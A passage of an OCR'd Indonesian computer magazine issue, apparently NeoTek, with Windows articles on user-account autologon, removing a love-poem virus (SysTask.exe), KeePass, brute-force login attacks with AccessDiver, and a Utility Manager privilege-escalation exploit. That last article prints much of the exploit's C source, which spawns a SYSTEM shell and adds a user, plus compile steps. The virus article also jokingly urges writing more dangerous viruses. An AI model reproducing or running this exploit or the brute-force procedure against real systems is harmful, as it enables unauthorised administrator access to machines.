                             fessional, user account yang      Management melalui menu Start           selain user
                             dipergunakan adalah Admi-                                                 account
                                                               Administrator, ada user account lainnya (penulis mem-
Gambar 1. Check User Account nistrator. Untuk mengetahui-      buat tiga buah user account , yaitu: Chen Mian Lin, Chen
pada tombol Log Off          nya, tekanlah tombol
                             Windows dan lihatlah pada         Ming An dan My Guest).
                             bagian Log Off.
Namun, setelah kita melakukan restart dan masuk ke da-
lam welcome screen , kita tidak melihat lagi user account
Administrator. Mungkin Anda bertanya, apakah user
account Administrator telah dihapus (di-delete) atau telah
dinonaktifkan (di-disable) ?
Jawabannya adalah tidak, terutama bila Anda melihatnya                                                           Gambar 3.
melalui Computer Management (dibahas pada bagian                                                                 Computer
lain). Memang, itulah salah satu sifat istimewa dari user                                                        Management
account Administrator bila menggunakan log on dengan           Untuk mengetahui aksi yang bisa diberlakukan pada tiap
welcome screen. Bila ada user account lain yang masuk          user account , Anda bisa melihatnya pada menu Action
dalam group Administrators, maka user account Adminis-         (bisa pula dengan mengklik-kanan pada user account ber-
trator tidak akan muncul. Namun bila tiada user account        sangkutan). Dan bila ingin lebih dalam lagi, Anda bisa
lain yang masuk dalam group Administrators (misalkan           masuk ke sub-menu Properties (bisa pula dengan meng-
hanya ada user account lain yang masuk dalam group             klik-ganda pada user account bersangkutan), di mana ada
Guests), maka user account Administrator akan muncul.          tiga buah tab yaitu:
Kalau begitu, apakah log on dengan welcome screen jauh         ?   General
lebih baik bila dibanding dengan classic logon prompt dari
sisi sekuritas? Jawabannya adalah tidak, karena untuk be-      ?   Member Of
ralih dari log on dengan welcome screen ke classic logon       ?   Profile
prompt cukup mudah. Bila Anda berada pada logon                Khusus untuk tab Profile umumnya hanya dipakai bila
dengan welcome screen dan ingin beralih ke classic logon       komputer difungsikan sebagai server.
prompt bisa dengan menekan tombol Ctrl+Alt+Del bebe-
rapa kali (biasanya dua kali).                                 Bila Anda mengklik-kanan pada area kosong, maka Anda
                                                               bisa menambahkan user account baru.
Oleh karena itu, saran penulis adalah sebaiknya Anda
men-disable user account Administrator melalui                 Automatic Logon


                                                                                                 Vol. IV No. 11 NeoTek   29
                   NeoTekno

Ada tiga macam cara untuk melakukan automatic                    selanjutnya. Bila langkah awal tidak berhasil, sebaiknya
logon,yaitu:                                                     jangan diteruskan ke langkah selanjutnya untuk meng-
? Pertama, hanya user account Administrator yang                 hindari hal-hal yang tidak diinginkan (tidak bisa log on
   aktif, di mana pada user account Administrator tidak          sama sekali).
   memiliki password.                                                                           Pada Computer
?    Kedua, hanya ada satu user account yang masuk dalam                                        Management , masuklah
     group Administrators (di luar user account Administrator)                                  percabangan Computer
     yang aktif, di mana pada user account tersebut tidak                                       Management
     memiliki password. Dengan demikian, posisi user                                            (Local)>System
     account Administrator tergantikan, sehingga apakah                                         Tools>Local Users and
     user account Administrator aktif (bisa memiliki pass-                                      Groups>Users. Pilihlah
     word) atau nonaktif tidak berpengaruh.                                                     user account yang akan
                                                                                                dikenakan aksi (dalam
?    Ketiga, dengan melakukan perubahan setting registry,                                       contoh ini user account My
     terutama pada key                                                                          Guest) dan pilihlah menu
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\                                                     Action>Properties. Pada
     Windows NT\CurrentVersion\Winlogon. Pada name                                              tab General , isilah input
     AutoAdminLogon isilah dengan 1 dan pada name                                               Full name: dengan nama
                                                                 Gambar 5. MyGuest Properties
     DefaultUserName isilah dengan user account yang                                            alias yang diinginkan
     akan diberlakukan automatic logon.                          (sebagai contoh adalah Guest) dan Anda hanya memberi
Dari hasil percobaan penulis, cara ketiga sangat menarik,        checklist untuk checkbox User cannot change password
karena tidak hanya berlaku untuk user account yang ma-           serta Password never expires. Masuklah ke tab Member
suk dalam group Administrators. Di samping itu, berlaku          Of untuk menambah atau menghapus group.
pula bagi user account yang memiliki password serta tidak        Untuk menambah group, kliklah button Add... Kini, Anda
dipengaruhi banyaknya user account yang aktif.                   akan dihadapkan ke suatu input box. Bila Anda tidak tahu
Bila kita perhatikan, sebenarnya yang dilakukan oleh             harus diisi apa, paling gampang adalah dengan mengklik
automatic logon adalah secara otomatis memasukkan user           button Advanced... Pada windows selanjutnya, kliklah
account dan password (bila ada) pada classic logon prompt.       button Find Now. Kini Anda bisa memilih dari bermacam
                                                                 group yang tersedia (dalam contoh ini ditambahkan group
Automatic Logon: User account Group Guests                       Guests).
Ada sebuah user account lainnya yang cukup istimewa,             Untuk menghapus group caranya cukup mudah, yaitu
yaitu user account Guest. Pada bagian ini, penulis akan          Anda tinggal memilih group yang akan dihapus, lalu klik
mengajarkan bagaimana membuat sendiri user account               button Remove (dalam contoh ini dihapus group
yang masuk ke dalam group Guests serta pada user                 Administrators).
account ini diberlakukan automatic logon .
                                                                 Salah satu keistimewaan suatu user account yang masuk
Sengaja penulis tidak memanfaatkan user account Guest            ke dalam group Guests adalah tidak bisa instalasi program
tetapi membuat sendiri user account yang masuk ke da-            serta tidak bisa mengubah registry .
lam group Guests. Hal ini disebabkan user account Guest
merupakan juga salah satu user account istimewa, sehing-         Local Security Policy
ga pada Control Panel>User Accounts tiada fasilitas untuk        Selain menu Computer Management, ada baiknya pula
membuat (create) password untuk user account Guest.              Anda mencoba menu Local Security Policy. Menu Local
Log On dengan user account yang masuk ke dalam group             Security Policy bisa diperoleh dari Control
Administrators, di mana user account tersebut akan diubah        Panel>Administrative Tools atau dari
ke dalam group Guests dan diberlakukan automatic logon           Start>Programs>Administrative Tools (bila Anda meng-
(sebagai contoh adalah My Guest). Ubah setting registry ,        aktifkannya pada Taskbar and Start Menu) sebagaimana
terutama pada key                                                halnya menu Computer Management.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win                        Hal-hal yang berkaitan dengan pengaturan user account
dows NT\CurrentVersion\Winlogon.                                 pada menu Local Security Policy, terutama pada perca-
Pada name AutoAdminLogon isilah dengan 1 dan pada                bangan Security Setting>Local Policies>User Rights
name DefaultUserName isilah dengan My Guest .                    Assignment serta Security Setting>Local
                                                                 Policies>Security Options.
Pada Control Panel>User Accounts, buatlah password (bi-
la belum memiliki password) atau mengubah password               Banyak hal-hal menarik yang berkaitan dengan masalah
namun tetap diisi dengan password yang sama (bila sudah          user account dan group, bila Anda mencoba menu ini.
memiliki password) untuk user account My Guest .                 Penutup
Password dalam hal ini sangat diperlukan, karena entah
mengapa bila tidak diberi password maka suatu user               Penulis ingatkan, bahwa utak-atik user account memiliki
account yang masuk ke dalam group Guests dan diberla-            resiko yang tinggi (penulis sendiri sampai beberapa kali
kukan automatic logon, maka hanya bisa sekali untuk              melakukan instalasi ulang Windows XP Professional,
automatic logon. Ingat, janganlah membuat maupun                 karena kasus tidak bisa log on sama sekali) dan penulis
mengubah password dari Administrative                            tidak bertanggung-jawab atas resiko yang dialami oleh
Tools>Computer Management, karena entah mengapa                  pembaca ketika mencobanya.
tidak berhasil untuk automatic logon.                            Dalam percobaan ini, penulis memakai Windows XP
Lakukan restart untuk menguji apakah automatic logon             Professional yang telah dilengkapi dengan Service Pack 2
awal berhasil. Bila YA, maka dapat diteruskan ke langkah         2004.


30     NeoTek Vol. IV No. 11
                                                                                             NeoTekno


                                                               WINDOWS SECURITY
                                                         Solusi Puisi Cinta
   Pengguna Windows mungkin tidak aneh lagi dengan apa yang akan dibahas dalam bahasan ini
  karena memang cukup banyak yang menjadi korbannya. Tidak begitu memberi dampak yang berat
terhadap komputer tetapi cukup membuat panik diri kita. Bung H3ro1n (h3r01n_lim@yahoo.com)
                        membahas solusinya bagi anda yang pernah berhadapan pengganggu ini.

 D
         EARM Y L OVE , S EBIRU TATAPANMU, SEBIRU HATIMU,      file ini dalam disket yang baru saja dibawa dari warnet.
        sebiru kasihmu. biru merupakan damainya                Dengan icon Ms Word (document), siapa sangka exten-
        sebuah cinta. hutahu semuanya!! namun semua            sion file-nya adalah EXE. Klik saja siapa tau isinya bagus,
bukanlah untukku karna aku tak pantas untukmu.                 ternyata tidak ada yang istimewa, hanya beberapa baris
Hanya keperihan serta kerinduan tak bertepi yang               kalimat yang terlihat pada tulisan diatas.
pantas kudapat darimu -----BlueLove.                           Setelah beberapa lama, dan mengganti disket, penulis ba-
PuisiCinta, Kenangan, MyLove. Sungguh romantis sekali.         ru sadar. Kenapa file document dengan exstension EXE
Siapa yang tak ingin membaca file document yang uku-           selalu ada dalam disket, walaupun disket baru, ternyata
ran 56 Kb, tapi sekali anda membukanya, maka akan men-         komputer penulis sendiri telah terinfeksi. Tenang saja, ada
jadi bencana bagi PC anda.                                     om Norton, tapi ternyata gagal dan tidak dapat mene-
Sampai saat ini penulis belum menemukan tanda-tanda            mukan virus ini.
kerusakan yang diakibatkan oleh virus jenis ini. Tapi, apa-    Virus ini jalan sewaktu windows runing (Startup), berarti
kah motif pembuat virus ini? Apakah karena patah hati?         ada dalam Registry, MsConfig, Startup, dan Win.ini, atau
Oh... tidak, tapi bagi anda-anda sekalian yang pernah ka-      System.ini. Ternyata benar, penulis menemukannya pada
lang kabut oleh virus ini atau anda yang sedang sibuk          registry dengan string:
mencari solusi untuk melenyapkan virus ini dari PC anda,       LoadService = C:\WINDOWS\System32\SysTask.exe /run di
jangan pernah mengutuk pembuat virus yang baik hati            HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
ini. Mengapa penulis berpesan begitu? Ini adalah logika,       Windows\CurrentVersion\Run
banyak rekan-rekan penulis yang mengeluh oleh virus
ini, bahkan di milis juga banyak yang mempertanyakan                                                         Tapi registry
masalah yang sama. Itu bertanda penyebarannya luma-                                                          tidak dapat di
yan banyak, tapi untung saja pembuat virus ini tidak pu-                                                     klik atau di
nya niat lain selain menyebarkan kisah cintanya yang ke-                                                     close, sama
labu. Tentu saja pembuat virus bisa menyelipkan sedikit                                                      halnya dengan
saja coding perusak, sehingga PC yang terinfeksi tidak                                                       MsConfig. Ter-
akan terselamatkan lagi baik itu data penting, game, atau      Gambar 2. Regedit yang terkunci (lock)        nyata pembuat
mp3 kesayangan anda. Tapi penulis tidak dapat memberi-                                                       virus telah
kan jaminan kepada pembaca bahwa dikemudian hari pem-          membuat proteksi agar virus nya tidak dapat dihentikan.
buat virus yang sama tidak membuat virus yang memba-           Coba lakukanlah hal yang sama pada PC anda dirumah,
hayakan anda, semoga saja tidak terjadi.                       apakah ciri diatas pernah atau sedang anda alami. Bagus-
Cukup sudah bincang-bincangnya, mari kita lanjutkan            lah jika ada. Berarti anda telah terinfeksi, dan harus me-
pembahasan yang lebih seru lagi.                               lanjutkan membaca pembahasan penulis. Jika belum per-
                                                               nah, penulis berdoa agar pembaca segera agar dapat mem-
Telah Terinfeksikah PC Anda?                                   praktekkan cara ini.
Kok aneh banget yach? File sapa seh ini? Inilah pertanyaan     Solusinya
salah satu rekan kantor saya. Penasaran sekali rasanya
ingin membaca file PuisiCinta. Bukanlah hal yang bodoh         Sebenarnya virus ini berekstensi EXE, untuk mengecoh
jika ingin membaca file ini, terus terang saja, penulis juga   menggunakan icon Ms Word dimana memiliki ukuran file
sempat terkecoh pada saat pertama sekali (2003) melihat        sebesar 56 Kb.
                                                               Setelah ditemukan, hapus secara manual. Sampai ada satu
                                                               file yang tidak dapat dihapus dengan muncul kotak pesan
                                                               Access Denied
                                                                                            Inilah file induknya, PC anda
                                                                                            dihidupkan, file ini yang jalan
                                                                                            bersama program lainnya.
                                                                                           File ini berada di
                                                                                           C:\Windows\System32
                                                               Gambar 3. Pesan tidak dapat (WinXP) atau
                                                               menghapus file systask.exe  C:\Windows\System
                                                                                           (Win98), memiliki nama
                                                               yaitu Systask.exe. Dalam lingkup Operating System
Gambar 1. Infeksi pada Drive A:\ (Floppy)                      Windows 98, file yang sedang aktif tidak dapat dihapus,

                                                                                             Vol. IV No. 11 NeoTek      31
                    NeoTekno

                        jika menggunakan cara EndTask
                        yaitu menonaktifkan file tertentu
                        yang sedang aktif dengan teknik
                        menekan kombinasi pada tuts
                        keyboard CTRL+ALT+DEL,
                        maka file systask.exe ini akan
                        kembali aktif dengan sendirinya
                        dan tetap saja tidak dihapus.
Gambar 4. EndTask       Perlu dipikirkan cara lain untuk
                        dapat menghapus file tersebut,
berikut di bawah dapat mengentaskan permasalahan.
Cara Hapus di Win98
                              Restart komputer dengan
                              opsi restart in MS-DOS
                              Mode, anda nantinya akan
                              menuju layar DOS Prompt
                              dan berada di direktori         Gambar 8. Windows Task Manager
                              C:\Windows. Ingat file
                                                              itu pasti dapat di hapus. Apabila anda bosan melakukan
                              systask.exe yang akan
                                                              hal bertele-tele, masih ada solusi lain yaitu bukalah editor
                              dihapus berada di direktori
Gambar 5. Restart in MS-DOS                                   page seperti notepad lalu ketikkanlah baris berikut:
mode                          C:\Windows\System, jadi
                              masuklah ke direktori Sys-      REGEDIT4
tem dengan mengetikan cd system . Untuk menemukan             ; Registry
file systask.exe yang akan dihapuskan, ketikkan dir           ; h3r01n_lim@yahoo.com
systask.exe. Untuk menghapusnya ketikkan del                  ;
systask.exe. Kemudian masuk ke windows dengan                 ;
mengetikkan Win.                                              [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win
                                                              dows\CurrentVersion\Run]
                                     Setelah masuk ke         "LoadService"=""
                                     windows, pastikanlah
                                     file virus benar-
                                     benar tidak ada, cari
                                     dengan fasilitas Find.
                                     Setelah yakin tidak
                                     ada, periksa kembali
                                     disket anda, siapa ta-
Gambar 6. Menghapus file systask.exe hu, masih ada yang
melalui DOSprompt
                                     tertinggal dimana        Gambar 9. Mengatasi dengan membuat file regedit
sewaktu-waktu kembali menyerang. Selanjutnya bersih-
kan Registry anda dengan cara manual.
                                                              kemudian simpan dengan file Vir.Reg, setelah disimpan,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win
                                                              cari kembali file itu lalu klik. Agar masuk ke registry.
dows\CurrentVersion\Run
                                                              Kemudian restart. Lalu hapus semua file virus seperti cara
String Name : LoadService
                                                              di atas.
String Value : C:\WINDOWS\System32\SysTask.exe /run
                                                              Jika cara ini masih di anggap bertele-tele, maka segera
                                                              buat Startup disk lalu format hard disk anda. Hehe...
                                                              Selesai sudah, pesan terakhir dari penulis, apabila PC
                                                              anda pernah terinfeksi atau telah terinfeksi, maka
                                                              jangan pernah menyalahkan pembuat virus ini, ini
                                                              kesalahan anda. Siapa suruh membukanya hehe... dan
                                                              satu lagi kepada pembuat virus, Jangan menyusahkan
                                                              orang lain dengan membuat program aneh,
Gambar 7. Pembersihan di Registry
                                                              manfaatkanlah kemampuan yang anda miliki, dengan
Cara Hapus di WinXP                                           membuat virus yang lebih berbahaya hehe... saya tunggu
                                                              email anda, atau kita dapat bekerja sama.
Tekan Ctrl+Alt+Del akan muncul Windows Security ke-
mudian pilih Task Manager dan selanjutnya pilih tab           Salam kepada anggota Cracked dan Indoprog di mana
Processes seperti gambar 8.                                   saja. Eit… satu lagi info yang dapat penulis berikan,
                                                              varian dari virus ini mungkin telah anda alami juga, yaitu
Setelah menemukan file virus yang berjalan, maka sorot
                                                              Mistery.SCR, MyLove.SCR, dll. Dan semua itu adalah
lalu klik End Process untuk menghentikannya. Lalu anda
                                                              file SCR atau ScreenServer yang dapat juga di Eksekusi,
dapat menghapus secara manual Systask.Exe yang berada
                                                              dengan icon Notepad dan infeksi pada sebagian besar
di C:\Windows\System32
                                                              folder, tetapi hanya 1 file yang bekerja yaitu SysTask.exe.
Lakukanlah hal yang sama untuk pembersihan Disket,            Harap di ingat.
dan Registry (pada bagian sub Cara Hapus di Win98).
Apa bila cara ini dijalankan semua, penulis yakin, virus

32    NeoTek Vol. IV No. 11
                                                                                            NeoTekno


                                                               WINDOWS SECURITY
                                KeePass Password Safe
    Memiliki banyak password seringkali menimbulkan banyak masalah. Memiliki password yang
       banyak dalam arti kata setiap account memiliki password yang berbeda adalah hal yang baik.
       Larsen Victor (webmaster@lamelo.net) memberikan solusi untuk anda pengguna banyak
                                              password dan untuk menghindari program keylogger.
        ASSWORD, PASSWORD. JAMAN SEKARANG TIDAK ADA

 P       orang yang tidak mempunyai password. Untuk
         ponsel ada password, login komputer butuh pass-
         word, demikian juga untuk dial-up, email yang
mungkin lebih dari satu, file yang dienkripsi, atau bahkan
aplikasi yang membutuhkan pasword, dan lain-lain.
Begitu banyak password untuk begitu banyak keperluan.          Gambar 2. Add entry
Pernahkan anda dibuat pusing hanya untuk mengingat
                                                               Hide Password Behind Asterisks. Hal ini otomatis sudah
password yang begitu banyak dan berbeda-beda. Atau
                                                                                                     tersetting supaya
anda harus mencatat semua password itu dan menyim-
                                                                                                     lebih menjaga
pannya meski tetap dibuat resah karenanya.
                                                                                                     keamanan.
Kini anda tidak perlu lagi resah memikirkan semua itu.                                               3. Setelah mema-
KeePass Password akan menyimpan semua database pass-                                                 sukkan database,
word anda dan menguncinya dengan sebuah password                                                     simpan database
utama. Password utama inilah yang hanya harus anda                                                   anda dengan klik
ingat. Mengenai enkripsi anda tidak usah khawatir, KeePass                                           File>Save
Password menggunaan teknologi enkripsi 256 bit yang                                                  Database as.
sangat kuat. Anda juga tidak perlu khawatir dengan pro-
gram semacam keylogger yang merekam aktivitas keyboard.        Gambar 3. Save database
                                                                                                        4. Hal penting
                                                                                                        yang perlu diingat
Untuk mendapatkan program yang tergolong open source           adalah dimana anda menyimpan file database anda (ber-
alias gratis ini dapat didownload di keepass.sourceforge.net   ekstensi .kdb). Cara yang lebih aman tentu anda menyim-
dan ukurannya tergolong kecil hanya 614 KB. Program            pannya di media, misal disket atau flash disk yang juga
ini dapat anda gunakan di semua versi windows mulai da-        berfungsi sebagai kunci utama. Hal ini menjadikan anda
ri windows 95 sampai windows 2003.                             hanya cukup memikirkan keamanan dan kerahasiaan
Membuat Database Password                                      Disket atau FlashDisc tersebut. Lagipula siapa yang akan
1. Jalankan aplikasi, klik File>New Database. Anda akan        menyangka flash disc anda berfungsi sebagai kunci. Cara
diminta memasukkan password utama anda. Hal yang me-           anda membuka database password adalah klik File>Open
narik disini adalah ada pilihan dimana anda dapat meng-        Database, pilih di mana database anda berada, dan akan
gunakan disket atau media lainnya sebagai password. Ar-        diminta mengisikan password utama (bisa flash disc,
tinya disket itulah yang berfungsi sebagai password, bu-       disket atau sebuah password utama).
kannya digunakan untuk menyimpan password. Disket              Tips
                                                  tersebut,    1. Gunakan media yang sama (disket atau flash disc) un-
                                                  secara u-    tuk menyimpan file database anda dan sekaligus kunci
                                                  nik, akan    untuk membuka database. Hal ini lebih praktis dan simple.
                                                  berfung-     Selain itu anda tidak menggunakan keyboard sehingga
                                                  si sebagai   tidak mungkin dibajak oleh program keylogger.
                                                  kunci
                                                  utama,       2. Simpan/copy-kan sumber instalasi KeePass Pasword ke
                                                  dan ten-     media tersebut sehingga anda dapat melakukan instalasi
                                                  tu saja      dan membuka database password anda di tempat lain.
                                                  tidak bo-    Program ini toh tidak terinstall di semua komputer.
Gambar 1. Create a new password database          leh hi-      3. Ketika anda melihat di database password anda hanya
                                                  lang.        berupa tanda asterisk (*), ubah saja settingnya yaitu klik
Tentu saja media ini bisa juga flash disk ataupun CD.          View > Hide Password Behind Asterisks.
2. Setelah memilih password utama, anda akan diminta           4. Lakukan copy/paste password dari database password
untuk memasukan entri pada database anda. Masukkan             anda ke aplikasi lain, misal email. Jangan diketik untuk
password-password yang anda punya. KeePass sudah me-           mengindari program keylogger. Jangan khawatir, data pa-
misahkan kategori-kategori untuk anda. Cara memasuk-           da memory/clipboard (yang digunakan saat melakukan
kan entri password adalah klik Edit > Add Entry.               operasi copy/paste) akan dihapus setelah 10 detik. Setting
Anda dapat memilih apakah password akan terlihat atau          waktu inipun bisa anda ubah-ubah besarannya dengan
disamarkan dengan asterisk (*). Untuk itu klik View >          klik Edit > Option > Memory.


                                                                                             Vol. IV No. 11 NeoTek    33
                 NeoTekno


WINDOWS SECURITY                                                                    D
                                                                                           ALAM SEBUAH ANATOMI PROSES
                                                                                             Hacking, Gaining Access merupa-
                                                                                             kan suatu proses dimana kita men-
                                                                                   dapatkan hak khusus setara admin ataupun


ACCESSDIVER
                                                                                   hanya sebagai user biasa, dimana nantinya
                                                                                   akan berguna dalam proses-proses hacking
                                                                                   selanjutnya.

GAINING ACCESS TOOL                                                                Dari berbagai macam cara untuk mendapat-
                                                                                   kan akses ini, teknik brute force atau pass-
                                                                                   word revealing menjadi trik utama untuk
Dalam urusan hacking, gaining access merupakan urutan                              mendapatkan akses setara admin. Bahasan
                                                                                   kali ini kita akan bahas teknik brute force
yang tidak terpisah karena dapat menentukan langkah                                login dengan menggunakan AccessDiver,
selanjutnya yang perlu dilakukan. Andi Ismayadi                                    sebuah tool eksotis yang memiliki berbagai
                                                                                   fasilitas gaining akses maupun berbagai
(fuzk3_kendi@yahoo.com) mengulas AccessDiver yaitu tool                            teknik hacking lain yang ada didalamnya.
yang dapat digunakan dalam tahapan gaining access.

 Penggunaan AccessDiver sebagai Gaining Access Tool.




        INSTALASI                                TAMPILAN                                        SKILL
 1      Download AccessDiver di
        situsnya www.accessdiver.com
                                             2   Setelah itu jalankan AccessDiver-
                                                 nya, versi ini adalah versi ke-4 yang
                                                                                          3      Klik tab My Skill, disini anda
                                                                                                 dapat menentukan tingkatan
        atau www.fuzk3.net/download              telah diperbaiki bug-nya dan ter-               serangan anda, dibagai dalam 3
        atau mengambil dari CD yang              dapat fitur-fitur baru. Namun yang              jenis yaitu Newbie, Familiar, dan
        disertakan bersama majalah ini.          kita pakai adalah versi demo,                   Expert. Untuk pertama kali kita
        kemudian lakukan instalasi dan           ingin full versi? Anda diharuskan               pilih Newbie.
        ikuti langkah-langkah yang               membelinya terlebih dahulu di
        nantinya akan ditemukan.                 situsnya.




        DICTIONARY                               MENGATUR SERANGAN                               ATTACK TESTING
 4      Masuk ke tab Dictionary, dimana
        dalam setting ini kita akan tentu-
                                             5   Masuk ke tab Setting untuk menga-
                                                 tur serangan ini. Disini disebutkan
                                                                                          6      Setelah itu masukan target di da-
                                                                                                 lam Input Box Server. Jangan lupa
        kan daftar listing user dan              bahwa AccessDiver akan berhenti                 untuk mengatur setting kecepatan
        password sebagai kamus untuk             setelah mendapatkan 1 login                     serangan. Lalu klik tombol Standard
        melakukan brute force. Apabila           yang lemah, kita tentunya tidak                 untuk memulai serangan. Apabila
        anda telah memiliki kamus sen-           mau hanya satu saja bukan. Nah,                 kita menemukan login yang lemah
        diri anda dapat membukanya di            untuk itu pilih Kotak Never Stop -              maka aka disimpan di tab
        icon Open Folder.                        Continue Until End.                             History-Weak Login Founds.


34   NeoTek Vol. IV No. 11
                                                                                                              NeoTekno


                                                                            WINDOWS SECURITY
                                           Utility Manager Exploit
         Kenali Windows XP anda lebih mendalam karena sangat penting sekali dalam me-manage
      aplikasi-aplikasi yang ada. Iko Riyadi (iko94@yahoo.com) mengajak anda dalam menganalisa
             Windows XP anda untuk menambahkan dan bahkan memperbaiki Utility Manager Local.



 K
         ALI INI AKAN MEMBAHAS MENGENAI MENGANALISA                         //by Cesar Cerrudo sqlsec>at<yahoo.com
        dan menambahkan beberapa kemungkinan per-                           //Local elevation of priviliges exploit for Windows 2K Utility
        baikan dan pengembangan UtilMan Local Exploit.                      Manager (second one!!!!)
Seperti yang telah kita ketahui, utility manager adalah                     //Gives you a shell with system privileges
program untuk me-manage beberapa aplikasi yang lain,                        //If you have problems try changing Sleep() values.
defaultnya adalah Magnifier, Narrator dan On-Screen                         /* end of original disclaimer */
Keyboard.
                                                                            #include <stdio.h>
Ini berarti aplikasi utility manager dijalankan oleh system                 #include <windows.h>
windows itu sendiri, tentunya dengan privileges setingkat
                                                                            struct {
administrators. Fenomena itulah yang dicoba untuk dieks-
                                                                             int id; //PRIMARYLANGID
ploitasi dengan cara mencoba menjalankan cmd.exe mela-
                                                                             char *utilman; char *winhelp; char *open; //search & edit by
lui jendela opening help dari utility manager.
                                                                            yourself for other lang
Tentunya tidak semudah yang kita bayangkan, karena                          } lang[] = { // u can add here for other lang
proses ini tidak bisa menggunakan cara konvensional, kita                               { 0x00,"Utility manager","Windows Help","Open" },
harus menggunakan Library Windows API (Application                                                           /* Neutral */
Programming Interface) agar kita bisa bekerja pada level                                { 0x01,"Utility manager","Windows Help","Open" },
sistem operasi.                                                                                              /* Arabic */
Utility Manager ini dapat dipanggil dengan shortcut                                     { 0x02,"Utility manager","Windows Help","Open" },
WinKey+U, ini berguna nanti bila kita hanya memiliki                                                         /* Bulgarian */
level users pada saat menjalankan eksploitnya, sedangkan                                { 0x03,"Utility manager","Windows Help","Open" },
level power users tidak akan mengalami masalah sewaktu                                                       /* Catalan */
menjalankan eksploit tersebut.                                                          { 0x04,"Utility manager","Windows Help","Open" },
                                                                                                             /* Chinese */
Berikut exploit source-nya :                                                            { 0x05,"Utility manager","Windows Help","Open" },
/*                                                                                                           /* Czech */
LAST MODIFIED BY bima_ at www.neoteker.or.id                                            { 0x06,"Utility manager","Windows Help","Open" },
No Warranty, all of this thing is for educational purpose only,                                              /* Danish */
comersial use is prohibited                                                             { 0x07,"Utility manager","Windows Help","Open" },
original exploit can found at www.k-otik.com                                                                 /* German */
bima_ add :                                                                             { 0x08,"Utility manager","Windows Help","Open" },
[+] language element at struct                                                                               /* Greek */
[+] fixed id input at select language                                                   { 0x09,"Utility manager","Windows Help","Open" },
[+] give option to english language (assumed the most default                                                /* English */
language widely used is english)                                                        { 0x0a,"Utility manager","Windows Help","Open" },
[+] close Microsoft Narrator and Narrator windows after the                                                  /* Spanish */
opening cmd process done                                                                { 0x0b,"Utility manager","Windows Help","Open" },
[+] at spawned cmd window with system privileges,                                                            /* Finnish */
automatically add user name : annu pass : 0354                                          //{ 0x0c,"Utility manager","Windows Help","Open" }
  plz send your comments and suggestions to :                                                                            /* French */
  iko94@yahoo.com                                                                       { 0x0c,"Gestionnaire d'utilitaires","aide de
  see www.geocities.com/iko94 for more complete informations                Windows","Ouvrir" }              /* French */
*/                                                                          };

/************************************************************************   void print_lang(int id)
                                                                            {
*C****O****R****M*****P*****U*****T*****E*****R*****2***0***0***4*          char *lang_list[] =
* *Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **        {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
*************************************************************************     "Danish","German","Greek","English","Spanish","Finnish",
** It gets system language and sets windows names to work on any              "French","Hebrew","Hungarian","Icelandic","italian",
win2k :P **                                                                   "Japanese","Korean","Dutch","Norwegian","Polish",
**              Feel free to add other languages :)                   **      "Portuguese","Romanian","Russian","Croatian","Serbian",
**                You know where we are..                                     "Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
**O****R****O*****M*****P****U****T****E****R****2***0***0***4**/             "Indonesian","Ukrainian","Belarusian","Slovenian",
/* original disclaimer */


                                                                                                              Vol. IV No. 11 NeoTek          35
                     NeoTekno

   "Estonian","Latvian","Lithuanian","Farsi","Vietnamese",               Compiling dan Building
  "Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",             Proses compiling dan building dengan menggunakan Visual
   "Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",               C++ 6 dapat dilihat pada gambar berikut :
   "Swahili","Uzbek","Tatar","Not supported","Punjabi",
   "Gujarati","Not supported","Tamil","Telugu","Kannada",                Open file eksploit
   "Not supported","Not supported","Marathi","Sanskrit",                 Buka Source yang telah disiapkan dan telah dipaket dalam
   "Mongolian","Galician the best ;)","Konkani","Not supported",         file dengan extension c (*.c) melalui menu File > Open
   "Not supported","Syriac","Not supported","Not supported",
   "Divehi","Invariant"};
   printf("%s\r\n",lang_list[id]);
   return;
 }
 int set_lang(void)
 {
             unsigned int lang_usr,lang_sys,id;
             id=GetSystemDefaultLangID(); //retrieves the system
 default language identifier
             printf("\t[*] system default language id\t= %d\r\n",id);
             lang_sys=PRIMARYLANGID(id); //extracts a primary                                                        Gambar 1. Open
 language identifier from a language identifier                                                                      file
             printf("\t[-] lang_sys\t= %d\r\n",lang_sys);
             id=GetUserDefaultLangID(); //retrieves the user default
                                                                         Compiling
 language identifier
             printf("\t[*] user default language id\t= %d\r\n",id);      Setelah file berisi source terbuka, selanjutnya adalah
             lang_usr=PRIMARYLANGID(id);                                 meng-compile-nya. Dari menu Build > Compile...
             printf("\t[-] lang_usr\t= %d\r\n",lang_usr);
             if(lang_usr!=lang_sys) {
                         printf("warning: user language differs from
 system language\r\n\r\n");
                         printf("1. system : ");print_lang(lang_sys);
                         printf("2. user :
 ");print_lang(lang_usr);printf("Select(1-2): ");
                         scanf("%d",&id);printf("\r\n[+] you're choice
 %d : ",id);
             if(id!=1&&id!=2) {
                         printf("\r\nwrong choice '%d',
 leaving.\r\n",id);                                                                                                  Gambar 2.
                         Sleep (3000);                                                                               Compile file
                         exit(0);
                         }
             if(id==1) {                                                 Choose “Yes”
                         printf("system language\r\n");                  Ketika muncul sebuah menu prompt untuk meng-create
                         return lang_sys;                                project workspaces, pilih yes.
                         }
             else                                                        Build
                         printf("user language\r\n");
             }
             return lang_usr;                                                                                Gambar 3. Menu prompt
 }                                                                                                           project workspaces
 void banner()
 {
           system("cls");                                                Langkah berikutnya adalah mem-build project, melalui
           printf("\r\n\r\n[Crpt] Utility Manager exploit v1.666         menu Build > Build...
 modified by kralor [Crpt] and bima_\r\n");
           printf("\t\t\t base code by Cesar Cerrudo\r\n");
           printf("\t\t\t You know where we are...\r\n\r\n");
           return;
 }
 int main(int argc, char* argv[])
 {
      HWND lHandle, lHandle2, lHandle3;
      POINT point;
      char cmd[]="%windir%\\system32\\cmd.ex?";

TextBox 1. Source lengkap dapat dilihat pada lampiran yang                                                          Gambar 4. Build
disediakan di dalam CD)                                                                                             project

36    NeoTek Vol. IV No. 11
                                                                                                     NeoTekno

Executing                                                          Lihat tombol Help, sebenarnya tombol itulah yang akan
